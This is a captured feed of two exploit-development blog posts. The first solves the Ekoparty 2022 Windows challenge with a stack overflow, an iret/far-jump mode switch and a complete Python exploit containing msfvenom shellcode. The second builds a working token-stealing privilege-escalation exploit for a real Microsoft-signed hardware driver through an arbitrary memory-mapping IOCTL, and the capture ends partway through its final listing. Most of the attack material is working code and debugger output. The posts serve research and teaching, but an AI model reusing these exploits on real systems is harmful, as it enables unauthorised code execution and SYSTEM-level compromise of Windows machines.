❌

Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulndev

Ekoparty 2022 BFS Windows Challenge

By: xct
3 November 2022 at 03:29

In this blog post, we will solve the Windows userland challenge that Blue Frost Security published for Ekoparty 2022. You can find the challenge & description here:

We analyze the bfs-eko2022.exe binary in IDA and can see that it’s binding to 0.0.0.0 on port 31415. After a client connects, it calls sub_140001160 which is checking that the first 6 bytes received are Hello\x00. If that’s the case, it will send back Hi\x00 and proceeds to call sub_140001240 where the main packet parsing is done. At the start of this function, it fills a heap buffer as seen below:

We can see 0x5050505050505050 being written followed by 0xcf58585858585858. This is repeated over the full length of the buffer (0x1000). At the beginning of the main function we can see how this buffer is allocated:

mov     r9d, 40h        ; flProtect
mov     r8d, 3000h      ; flAllocationType
mov     edx, 1000h      ; dwSize
mov     ecx, 10000000h  ; lpAddress
call    cs:VirtualAlloc

This buffer that is being filled is on the heap at 0x10000000 , read, write, and executable, and has a size of 0x1000. This shows that the initialization being done is filling the complete buffer. These initialization values are suspicious as you would normally expect a null initialization or random data. If we disassemble the bytes we get the following instructions:

0:  50                      push   eax
1:  50                      push   eax
2:  50                      push   eax
3:  50                      push   eax
4:  50                      push   eax
5:  50                      push   eax
6:  50                      push   eax
7:  50                      push   eax
8:  cf                      iret
9:  58                      pop    eax
a:  58                      pop    eax
b:  58                      pop    eax
c:  58                      pop    eax
d:  58                      pop    eax
e:  58                      pop    eax
f:  58                      pop    eax

This does not look random at all and will play a role later on. For now, let’s continue to follow the control flow of the packet parsing function. After the handshake and initialization, it receives more bytes, looking for a magic value 0x323230326F6B45 followed by the byte T which indicates the packet type. It then expects another 4 bytes that represent the packet length.

mov     rax, 323230326F6B45h
cmp     qword ptr [rsp+0F68h+buf], rax
jz      short loc_140001339
|
movzx   eax, [rsp+0F68h+var_20]
mov     [rsp+0F68h+var_38], al
movsx   eax, [rsp+0F68h+var_38]
cmp     eax, 54h ; 'T'
jz      short loc_140001366
|
movsx   eax, [rsp+0F68h+var_1F]
cmp     eax, 0F00h
jle     short loc_140001386

The packet length comparison at the end looks interesting. It’s supposed to make sure that the packet length field can not be larger than 0xf00. Before the comparison, it’s loading the value with movsx into EAX which is move with sign-extension. This means if we would send 0xffff it would get extended to 0xffffffff and be interpreted as a negative value. Since the last jump has to be taken and -1 is lower than 0xf00 we pass the check and can continue!

Continuing at 140001386 another receive is called, reading network input data into the heap buffer at 0x10000000. The maximum amount of data we can provide here is 0x1000, since anything more than that would go outside the allocated memory and cause an exception. It is then calling sub_1400011B0 on this data.

This function is now taking the data from the heap and copying it onto the stack, using the length we have provided inside the packet itself! Remember that the intended maximum length is 0xf00 but we were able to provide 0xffff instead. This leads to a stack overflow. Another thing this function is doing is filtering out 0x2b and 0x33 while doing to copy operation, replacing them with null bytes on the stack (this will be important later).

After the copy function is finished it will once again check that the packet type is T from the copy of the data that is now on the stack. If that’s the case (which it is if used normally) it will echo back the data it received and exit. By using our stack overflow, we can however overwrite the T on the stack with an X which leads to a win-function:

movsx   eax, [rsp+0F68h+var_38]
cmp     eax, 58h ; 'X'
jnz     short loc_140001474
|
mov     rcx, cs:buf
add     rcx, rax
mov     rax, rcx
mov     cs:off_14000C000, rax
lea     rcx, [rsp+0F68h+CmdLine] ; lpCmdLine
call    cs:off_14000C000

If we can get to this last basic block the program will jump exactly to length+1 of input buffer on the heap which contains the bytes that have been written during initialization. At this point, we control the stack to some extent and can influence to which exact byte of the pre-initialized heap memory we jump. The following PoC brings us to this point.

Poc_0x01

#!/usr/bin/env python3
import sys, socket, struct
p32 = lambda x: struct.pack('<I', x);

TARGET = '127.0.0.1'
PORT = 31415

sc = b""

p=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
p.connect((TARGET,PORT))

# handshake
p.send(b"Hello\x00")
p.recv(3) # Hi\x00

buf =  b""
buf += b"Eko2022\x00" # magic value  
buf += b"T" # packet type
buf += b"\xff\xff" # sign/type confusion


iret = b""
iret += p32(0x41414141) 	
iret += p32(0x42424242) 			
iret += p32(0x43434343) 	
iret += p32(0x44444444) 	
iret += p32(0x45454545)	

buf += iret
buf += sc
buf += b"A"*(0x0f00-len(iret)-len(sc))
buf += b"X" # X leads to packet type confusion
buf += b"B"*0x07 # we want pops, avoid pushs
p.send(buf)
p.recv(1)
p.close() 

When we break on the call instruction we can see that we land on the heap and can single step until the iret instruction. Note that we chose the input length in a way we avoid the pushs and land right at the pops in order to fully control the stack at the moment iret is called.

bp bfs_eko2022+0x146E
g
Breakpoint 0 hit
bfs_eko2022+0x146e:
00007ff7`c7f2146e ff158cab0000    call    qword ptr [bfs_eko2022+0xc000 (00007ff7`c7f2c000)] ds:00007ff7`c7f2c000=0000000010000f08
0:000> t
00000000`10000f08 58              pop     rax
0:000> p
00000000`10000f09 58              pop     rax
0:000> 
00000000`10000f0a 58              pop     rax
0:000> 
00000000`10000f0b 58              pop     rax
0:000> 
00000000`10000f0c 58              pop     rax
0:000> 
00000000`10000f0d 58              pop     rax
0:000> 
00000000`10000f0e 58              pop     rax
0:000> 
00000000`10000f0f cf              iretd
0:000> dd rsp
00000000`005eeb50  41414141 42424242 43434343 44444444
00000000`005eeb60  45454545 41414141 41414141 41414141

At this point, we have to do some digging on how iret works to see if we can craft the stack in a way that would let us gain (custom-) code execution. The iret instruction is used to return control from an exception or interrupt handler and is expecting the following values on the stack (very good article on this topic):

- new instruction pointer
- new code segment selector (CS)
- new value of EFLAGS register 
- new stack pointer
- new stack segment selector (SS)

As for the instruction pointer and stack pointer we could just point them into our heap buffer since we control a large part of it. The EFLAGS register we can get from debugging and then attempt to use the same value. This leaves us with CS and SS which is a bit tricky. CS and SS are used to index into the Global Descriptor Table (GDT) which has descriptors for kernel code/data and user code/data. Using WinDBG as a kernel debugger we can see which indices match which descriptor:

0: kd> dd @gdtr
fffff807`39e95fb0  00000000 00000000 00000000 00000000
fffff807`39e95fc0  00000000 00209b00 00000000 00409300
fffff807`39e95fd0  0000ffff 00cffb00 0000ffff 00cff300
fffff807`39e95fe0  00000000 0020fb00 00000000 00000000
fffff807`39e95ff0  40000067 39008be9 fffff807 00000000
fffff807`39e96000  00003c00 0040f300 00000000 00000000
fffff807`39e96010  00000000 00000000 00000000 00000000

The first 16 bytes are reserved, following those we can see that there are some values at offset 0x10 and 0x18:

0: kd> dg 0x10
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0010 00000000`00000000 00000000`00000000 Code RE Ac 0 Nb By P  Lo 0000029b
0: kd> dg 0x18
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0018 00000000`00000000 00000000`00000000 Data RW Ac 0 Bg By P  Nl 00000493

These should be the entries for the kernel. Then we have 2 more values following:

0: kd> dg 0x20
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0020 00000000`00000000 00000000`ffffffff Code RE Ac 3 Bg Pg P  Nl 00000cfb
0: kd> dg 0x28
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0028 00000000`00000000 00000000`ffffffff Data RW Ac 3 Bg Pg P  Nl 00000cf3

These are the user code and stack descriptors ranging from 0 to 0xffffffff. The 2 least significant bits of the selector value are being used for RPL (Requested Privilege Level) or CPL (Current Privilege Level). Because we are looking to stay in ring3 we have to set these to 1 – so 0x20 for the code segment becomes 0x23 and 0x28 becomes 0x2b.

CS and SS are only used in 32-bit mode (see: https://nixhacker.com/segmentation-in-intel-64-bit/) or lower – by supplying values there for our iret we will switch to 32-bit mode. With this bit of theory out of the way we still have a problem: 0x2b is a bad byte and will not end up on the stack! So we can choose 0x23 for the code segment but have to be creative on what to use for the stack segment.

Any value that will not crash on iret is fine in theory so it has to be Data RW but we don’t necessarily need a valid stack base and limit if we can avoid using the stack. After inspecting more values and seeing which ones do and don’t crash we eventually find 0x53:

0:000> dg 0x53
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0053 00000000`0060a000 00000000`00000fff Data RW Ac 3 Bg By P  Nl 000004f3

From the output, we can see that base and limit are not really useful for us but if we avoid the stack we should be fine (base and limit are also somewhat random and can change at reboots). Now it’s time to update the PoC:

PoC_0x02

...
sc =  b""
sc += b"\xcc"
sc += b"\x90"*100
...
iret = b""
iret += p32(0x10000014) 	
iret += p32(0x23) 			 
iret += p32(0x00010202) 	
iret += p32(0x10000400) 	
iret += p32(0x53)
...

Debugging the new PoC shows that we indeed end up in 32-bit mode inside our shellcode and can execute it!

0:000> 
00000000`10000f0f cf              iretd
0:000> dd rsp
00000000`00cfede0  10000014 00000023 00010202 10000400
00000000`00cfedf0  00000053 41414141 41414141 41414141
0:000> g
10000014 cc              int     3
0:000:x86> p
10000015 90              nop
0:000:x86> p
10000016 90              nop

Any attempt to use the stack will however fail (Note that WinDBG will automatically repair 0x53 back to 0x2b if you are single stepping – this can be confusing!). This means we will need to find a way to use the ability to execute shellcode to restore either stack functionality or get back to 64-bit.

As it turns out there is exactly such a thing. By using a far jump like this 0x33:0x100000xx we can specify 0x33 as the new code segment which will get us back to 64-bit. Since 64-bit does not need a stack segment selector we can now use the stack again! The only thing left to do (besides generating valid shellcode) is to restore the stack pointer. Luckily debugging shows that RCX still holds a reference to the stack so we can just copy it into RSP. After executing the jump into 64-bit mode we can now continue to execute 64-bit shellcode to restore the stack and then anything we like:

PoC_0x03

...
sc =  b""
sc += b"\xcc"
sc += b"\xea\x1c\x00\x00\x10\x33\x00" # from 0x10000014 0x1000001c
sc += b"\x48\x89\xC8\x48\x89\xC4" # restore original stack from ref in rcx
sc += b"\xcc"
...

Note that even though 0x33 is a bad byte this is only true for the stack – on the heap where the shellcode lies it will be unchanged. Debugging shows the swap back to 64-bit:

10000014 cc                      int     3
0:000:x86> p
10000015 ea1c0000103300          jmp     0033:1000001C
0:000:x86> p
00000000`1000001c 4889c8          mov     rax,rcx
0:000> p
00000000`1000001f 4889c4          mov     rsp,rax
0:000> 
00000000`10000022 cc              int     3

For the final exploit, all that is left to do is generate some shellcode, e.g. msfvenom -p windows/x64/exec cmd="calc" -f python .

Final PoC

#!/usr/bin/env python3
# Author: @xct_de

import sys, socket, struct
p32 = lambda x: struct.pack('<I', x);

TARGET = '127.0.0.1'
PORT = 31415

sc =  b""
#sc += b"\xcc"

sc += b"\xea\x1c\x00\x00\x10\x33\x00" # from 0x10000014 (x86) 0x1000001c (x64)
sc += b"\x48\x89\xC8\x48\x89\xC4"     # restore original stack from rcx

# msfvenom -p windows/x64/exec cmd="calc" -f python
sc += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51"
sc += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"
sc += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72"
sc += b"\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0"
sc += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
sc += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b"
sc += b"\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
sc += b"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44"
sc += b"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
sc += b"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
sc += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1"
sc += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
sc += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
sc += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
sc += b"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
sc += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
sc += b"\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48"
sc += b"\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d"
sc += b"\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5"
sc += b"\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
sc += b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
sc += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89"
sc += b"\xda\xff\xd5\x63\x61\x6c\x63\x00"

p=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
p.connect((TARGET,PORT))

# handshake
p.send(b"Hello\x00")
p.recv(3) # Hi\x00

buf = b""
buf += b"Eko2022\x00" # magic value  
buf += b"T" # packet type
buf += b"\xff\xff" # sign/type confusion

# switch from 64-bit to 32-bit via iret
iret = b""
iret += p32(0x10000014) 	
iret += p32(0x23) 			  
iret += p32(0x00010202) 	
iret += p32(0x10000400) 	
iret += p32(0x53)			    

buf += iret
buf += sc
buf += b"A"*(0x0f00-len(iret)-len(sc))
buf += b"X" # X leads to packet type confusion
buf += b"B"*0x07 # we want pops, avoid pushs
p.send(buf)
p.recv(1)
p.close() 

The post Ekoparty 2022 BFS Windows Challenge appeared first on Vulndev.

Windows Kernel Exploitation – Arbitrary Memory Mapping (x64)

By: xct
24 September 2022 at 11:09

In this post, we will develop an exploit for the HW driver. I picked this one because I looked for some real-life target to practice on and saw a post by Avast that mentioned vulnerabilities in an old version of this driver (Version 4.8.2 from 2015), that was used as part of a bigger exploit chain. Unfortunately, I could not find this one available for download so I ended up using the most recent version, 4.9.8 at the time of writing this post. This driver is signed by Microsoft so we can load it even without a kernel debugger attached (the certificate is expired since 2021 but that does not really prevent loading).

Advisory: https://ssd-disclosure.com/ssd-advisory-mts-hw-driver-escalation-of-privileges/

I started by trying to find the IOCTLs mentioned in the post but they do not exist anymore. Luckily the drivers provided some other relatively easy exploitable looking IOCTLs so I gave it a shot.

Vulnerability Discovery

Before starting the look at the driver in IDA I gave this excellent intro post by Voidsec another read to see what kind of starting points to look for:

  • MmMapIoSpace
  • rdmsr
  • wrmsr

At the end of the post, he mentions looking for MmMapIoSpace as an exercise which is something that we have in this driver as well. In the end, I ended up using a different function though.

After opening the driver IDA we look at the imports and can see a couple of functions that handle memory mappings:

Besides the already mentioned MmMapIoSpace there are a couple of other interesting functions here that we can potentially use, including MmMapLockedPages. Let’s see what both functions do:

PVOID MmMapIoSpace(
  [in] PHYSICAL_ADDRESS    PhysicalAddress,
  [in] SIZE_T              NumberOfBytes,
  [in] MEMORY_CACHING_TYPE CacheType
);

MmMapIoSpace allows mapping a physical memory address to a virtual (kernel-mode) address. This can be useful if you can control the arguments to the function, especially the first 2, through some IOCTL. In this driver, this is indeed the case with one of the IOCTLs but the memory is never mapped to a user-mode address afterward or returned, so I could not do much with it besides crashing the system (by mapping an invalid address). If this address would be mapped to a user-mode address and returned it can be exploited. There is an excellent post here on how to do it. Let’s look at the other function for now:

PVOID MmMapLockedPages(
  [in] PMDL MemoryDescriptorList,
  [in] __drv_strictType(KPROCESSOR_MODE / enum _MODE,__drv_typeConst)KPROCESSOR_MODE AccessMode
);

This function (which is deprecated according to Microsoft) allows mapping a virtual address to another one and takes in a pointer to a Memory Descriptor List (MDL). Usually, a call to this function is preceded by the following calls:

PMDL IoAllocateMdl(
  [in, optional]      __drv_aliasesMem PVOID VirtualAddress,
  [in]                ULONG                  Length,
  [in]                BOOLEAN                SecondaryBuffer,
  [in]                BOOLEAN                ChargeQuota,
  [in, out, optional] PIRP                   Irp
);

void MmBuildMdlForNonPagedPool(
  [in, out] PMDL MemoryDescriptorList
);

IoAllocateMdl takes a virtual memory address & length (we ignore the other arguments for now) and will result in an MDL that is large enough to map our requested buffer size (but not filled yet). The following MmBuildMdlForNonPagedPool will then update the structure with the information about the underlying physical pages that back the virtual memory we requested. Finally MmMapLockedPages takes this pointer to the MDL & returns another address in user-mode virtual memory where the physical pages described by the MDL have been mapped to.

This essentially means that if the 3 functions are executed in the order described, we create a second virtual address that maps to the same physical address as the initial virtual address.

With this theory out of the way, let’s see if and how we can reach this chain of functions. By following the references in IDA we can see that it’s used a few times throughout the program but only in 2 functions:

The path we are going to follow is sub_2E80 (also worth exploring the other one though). When we look at this function we first see a couple of checks being done on the arguments before it eventually ends up in the sequence of functions we just discussed:

For the checks inside the function, we will have a look in the debugger later since some of them might just not matter much to us (e.g. some might be automatically passed without any work from our side). For now, we focus on discovering how to reach this function in the first place. We look for references again and find quite a few:

All those refs are coming from the same function which is essentially a big switch/if/else construct for the different IOCTLs that this driver supports. Here we just go for the first one and follow the back-edges in IDA until we hit an IOCTL at 0x3F70:

cmp     [rsp+0D8h+var_24], 9C406500h
jz      loc_52D8

So with a potential IOCTL that can get close to the code path we want, we quickly check the driver start function which calls sub_1E80 and has the string we need in order to use CreateFile to get a handle to the driver.

Now we can write our first template and debug the driver:

#include "windows.h"
#include <stdio.h>

#define QWORD ULONGLONG
#define IOCTL_01 0x9C406500

int main() {
    DWORD index = 0;
    DWORD bytesWritten = 0;

    HANDLE hDriver = CreateFile(L"\\\\.\\HW", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }    
   
    LPVOID uInBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LPVOID uOutBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    QWORD* in = (QWORD*)((QWORD)uInBuf);
    *(in + index++) = 0x4141414142424242;
    *(in + index++) = 0x4343434344444444; 
    *(in + index++) = 0x4545454546464646;              

    DeviceIoControl(hDriver, IOCTL_01, (LPVOID)uInBuf, 0x1000, uOutBuf, 0x1000, &bytesWritten, NULL);

    return 0;
}

Before running the driver, we set a breakpoint on the IOCTL comparison so we can follow the execution flow in the debugger:

0: kd>.reload
0: kd> lm m hw64
Browse full module list
start             end                 module name
fffff806`5c1a0000 fffff806`5c1aa000   hw64       (deferred)
0: kd> ba e1 hw64+0x3F70
0: kd> g
...
Breakpoint 0 hit
hw64+0x3f70:
fffff806`5c1a3f70 81bc24b40000000065409c cmp dword ptr [rsp+0B4h],9C406500h

Now that we hit the breakpoint, we continue to step through the code and inspect the source of every comparison to make sure that we track any dependencies on our input buffer. After a few instructions, we hit a call to our target function at hw64+0x532b:

1: kd> 
hw64+0x532b:
fffff806`5c1a532b e850dbffff      call    hw64+0x2e80 (fffff806`5c1a2e80)
1: kd> r
rax=000000009c406500 rbx=ffffbb08113f9540 rcx=ffffbb080fc63000
rdx=0000000000000000 rsi=0000000000000002 rdi=0000000000000001
rip=fffff8065c1a532b rsp=ffffcb0d5189e700 rbp=ffffcb0d5189e881
 r8=ffffbb080e9c26c0  
1: kd> dq rcx
ffffbb08`0fc63000  41414141`42424242 43434343`44444444
ffffbb08`0fc63010  45454545`46464646 00000000`00000000
1: kd> t

We can see that this function takes our input buffer as the first argument – more precisely a copy of it since we can see that it’s at a kernel address. We step into the function and look for comparisons again.

1: kd> 
hw64+0x2ef0:
fffff806`5c1a2ef0 488b8424e0000000 mov     rax,qword ptr [rsp+0E0h]
1: kd> 
hw64+0x2ef8:
fffff806`5c1a2ef8 4883781000      cmp     qword ptr [rax+10h],0
1: kd> dq rax+10
ffffbb08`0fc63010  45454545`46464646 

Part of our input is compared to zero – if we trace the instructions in IDA we can see that in order to get to our vulnerable code block we need to not take the jump. So this is fine for now. In the next basic block the same comparison is done again and we also pass the check. This is repeated once more and we finally get to the block at hw64+0x2F60 that has the call to IoAllocateMdl.

1: kd> 
hw64+0x2f7f:
fffff806`5c1a2f7f ff155b410000    call    qword ptr [hw64+0x70e0 (fffff806`5c1a70e0)]
1: kd> r
rax=ffffbb080fc63000 rbx=ffffbb08113f9540 rcx=4545454546464646
rdx=0000000044444444 rsi=0000000000000002 rdi=0000000000000001
rip=fffff8065c1a2f7f rsp=ffffcb0d5189e620 rbp=ffffcb0d5189e881
 r8=0000000000000000  r9=0000000000000000

Let’s match the arguments to the function signature:

PMDL IoAllocateMdl(
  [in, optional]      __drv_aliasesMem PVOID VirtualAddress,  // 4545454546464646
  [in]                ULONG                  Length,          // 0000000044444444 
  [in]                BOOLEAN                SecondaryBuffer, // 0
  [in]                BOOLEAN                ChargeQuota,     // 0
  [in, out, optional] PIRP                   Irp              // 0 (on stack)
);

We can see that we control the VirtualAddress it’s getting an MDL for and the size. The values we provided are obviously useless but they helped us to trace our user input. The function actually doesn’t complain and we can step over it (since it only allocates the memory for the MDL). If we step further we hit MmBuildMdlForNonPagedPool:

1: kd> 
hw64+0x2f97:
fffff806`5c1a2f97 ff153b410000    call    qword ptr [hw64+0x70d8 (fffff806`5c1a70d8)]
1: kd> r
rax=ffffbb080d010000 rbx=ffffbb08113f9540 rcx=ffffbb080d010000

Which maps to this call:

void MmBuildMdlForNonPagedPool(
  [in, out] PMDL MemoryDescriptorList // ffffbb080d010000
);

This will now result in a BSOD since the size we requested is way too large and the address is bogus.

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffffa9a2a2a32320, memory referenced.

At this point, we know what our input buffer should look like to get an arbitrary memory mapping and we can continue with the exploitation section.

Exploitation

After having discovered the vulnerable IOCTL it’s time to start the exploitation process. Assuming we can map any kernel virtual address into a user-mode address – what could a good target be? A commonly used payload for kernel exploits is token stealing shellcode. We do not really need shellcode for escalating privileges though because we can copy the token of a SYSTEM process to our current process using the mapping mechanism as a read/write primitive (data-only attack). Executing shellcode is also possible but not in scope for this post. The plan of attack is as follows:

  • Get the address of a SYSTEM process and read the Token pointer
  • Get the address of our current process and overwrite the Token pointer with the one from the SYSTEM process

We can use NtQuerySystemInformation to get the address of a SYSTEM process in memory without using any exploit. We are then going to use our mapping primitive to map the memory where the process is located to a user-mode address. This allows us to read the fields of the EPROCESS structure including the Token, UniqueProcessId and ActiveProcessLinks, of which we can get offsets via the debugger:

1: kd> dt _EPROCESS
ntdll!_EPROCESS
   ....
   +0x440 UniqueProcessId  : Ptr64 Void
   +0x448 ActiveProcessLinks : _LIST_ENTRY
   ...
   +0x4b8 Token            : _EX_FAST_REF
   ...

We are updating the PoC to map the SYSTEM process & compare that the data of the mapped area & the original virtual address are indeed the same:

#include "windows.h"
#include <stdio.h>

#define QWORD ULONGLONG
#define IOCTL_01 0x9C406500

#define SystemHandleInformation 0x10
#define SystemHandleInformationSize 1024 * 1024 * 2

using fNtQuerySystemInformation = NTSTATUS(WINAPI*)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
    );

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
    USHORT UniqueProcessId;
    USHORT CreatorBackTraceIndex;
    UCHAR ObjectTypeIndex;
    UCHAR HandleAttributes;
    USHORT HandleValue;
    PVOID Object;
    ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;

typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG NumberOfHandles;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

typedef NTSTATUS(NTAPI* _NtQueryIntervalProfile)(
    DWORD ProfileSource,
    PULONG Interval
);

QWORD getSystemEProcess() {
    ULONG returnLenght = 0;
    fNtQuerySystemInformation NtQuerySystemInformation = (fNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll"), "NtQuerySystemInformation");
    PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize);
    NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLenght);
    SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[0];
    return (QWORD)handleInfo.Object;
}

QWORD mapArbMem(QWORD addr, HANDLE hDriver) {
    DWORD index = 0;
    DWORD bytesWritten = 0;
    LPVOID uInBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LPVOID uOutBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    QWORD* in = (QWORD*)((QWORD)uInBuf);
    *(in + index++) = 0x4141414142424242;
    *(in + index++) = 0x4343434300001000; // size
    *(in + index++) = addr;               // addr

    DeviceIoControl(hDriver, IOCTL_01, (LPVOID)uInBuf, 0x1000, uOutBuf, 0x1000, &bytesWritten, NULL);
    QWORD* out = (QWORD*)((QWORD)uOutBuf);
    QWORD mapped = *(out + 2);
    return mapped;
}

int main() {
    HANDLE hDriver = CreateFile(L"\\\\.\\HW", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }       

    printf("[>] Exploiting driver..\n");
    QWORD systemProc = getSystemEProcess();
    printf("System Process: %llx\n", systemProc);

    QWORD systemProcMap = mapArbMem(systemProc, hDriver);    
    printf("System Process Mapping: %llx\n", systemProcMap);

    getchar();
    DebugBreak();
    return 0;
}

The getchar() gives us the chance to copy the addresses out and the DebugBreak() conveniently breaks in the context of our process.

[>] Exploiting driver..
System Process: ffff850120cab040
System Process Mapping: 1ce40870040
...
1: kd> dq ffff850120cab040
ffff8501`20cab040  00000000`00000003 ffff8501`20cab048
ffff8501`20cab050  ffff8501`20cab048 ffff8501`20cab058
1: kd> dq 1ce40870040
000001ce`40870040  00000000`00000003 ffff8501`20cab048
000001ce`40870050  ffff8501`20cab048 ffff8501`20cab058

As expected, we got a mapping of the target address. We did not cover the output buffer yet – essentially if we inspect it after triggering the IOCTL with valid arguments we get something like the following back, which has the mapped user-mode address as the 3rd value:

 ffff850127c16970 4343434300001000 1ce40870040 00000000 ...

At this point, all that is left to do is read the SYSTEM token and then iterate through the ActiveProcessLinks linked list until we find our own process. When we find it, we overwrite our own Token with the SYSTEM one and are done. The final exploit implementing this can be found below:

#include "windows.h"
#include <stdio.h>

// Author: @xct_de
// Target: Windows 11 (10.0.22000)

#define QWORD ULONGLONG
#define IOCTL_01 0x9C406500

#define SystemHandleInformation 0x10
#define SystemHandleInformationSize 1024 * 1024 * 2

using fNtQuerySystemInformation = NTSTATUS(WINAPI*)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
    );

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
    USHORT UniqueProcessId;
    USHORT CreatorBackTraceIndex;
    UCHAR ObjectTypeIndex;
    UCHAR HandleAttributes;
    USHORT HandleValue;
    PVOID Object;
    ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;

typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG NumberOfHandles;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

typedef NTSTATUS(NTAPI* _NtQueryIntervalProfile)(
    DWORD ProfileSource,
    PULONG Interval
);

QWORD getSystemEProcess() {
    ULONG returnLenght = 0;
    fNtQuerySystemInformation NtQuerySystemInformation = (fNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll"), "NtQuerySystemInformation");
    PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize);
    NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLenght);
    SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[0];
    return (QWORD)handleInfo.Object;
}

QWORD mapArbMem(QWORD addr, HANDLE hDriver) {
    DWORD index = 0;
    DWORD bytesWritten = 0;
    LPVOID uInBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LPVOID uOutBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    QWORD* in = (QWORD*)((QWORD)uInBuf);
    *(in + index++) = 0x4141414142424242;
    *(in + index++) = 0x4343434300001000; // size
    *(in + index++) = addr;               // addr

    DeviceIoControl(hDriver, IOCTL_01, (LPVOID)uInBuf, 0x1000, uOutBuf, 0x1000, &bytesWritten, NULL);
    QWORD* out = (QWORD*)((QWORD)uOutBuf);
    QWORD mapped = *(out + 2);
    return mapped;
}

int main() {
